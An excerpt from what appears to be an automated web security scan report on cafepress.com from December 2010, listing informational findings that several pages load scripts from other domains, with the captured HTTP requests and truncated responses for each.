GET /1/3/indexc1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 134691 Content-Type: text/html; charset=utf-8 Date: Sun, 26 Dec 2010 13:49:07 GMT Connection: close Set-Cookie: slx_session=2f1df64475595c86770a06bc37800f787200ef6f; path=/ Cache-Control: no-cache, proxy-revalidate, max-age=10 Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <body> <script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"> </script>...[SNIP]...
5.46. http://www.cafepress.com/cp/info/about/
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/about/
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/numbers.js
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 46251 Date: Sun, 26 Dec 2010 13:44:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div><script language="JavaScript1.1" src="http://content4.cpcache.com/js/numbers.js"> </script>...[SNIP]...
5.47. http://www.cafepress.com/cp/info/help/index.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 58685 Date: Sun, 26 Dec 2010 13:44:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58685 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.48. http://www.cafepress.com/cp/info/sell/index.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /cp/info/sell/index.aspx?area=learn&page=learn HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 51638 Date: Sun, 26 Dec 2010 13:44:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51638 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.49. http://www.cafepress.com/cp/moredetails.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/moredetails.aspx
Issue detail
The response dynamically includes the following scripts from other domains:
http://content1.cpcache.com/js/import.js
http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js
Request
GET /cp/moredetails.aspx?showBleed=false&ProductNo=299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 5050 Date: Sun, 26 Dec 2010 13:44:58 GMT Content-Length: 5050 Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script><script type="text/javascript" src="http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js"> </script> <script type="text/javascript" src="http://content1.cpcache.com/js/import.js"> </script>...[SNIP]...
5.50. http://www.cafepress.com/cp/sitemap/
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/sitemap/
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 147577 Date: Sun, 26 Dec 2010 13:44:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 147577 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.51. http://www.cafepress.com/cp/viewcart.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/viewcart.aspx
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/js/cartv2.js
http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://www.googleadservices.com/pagead/conversion.js
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 51145
Date: Sun, 26 Dec 2010 13:44:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51145

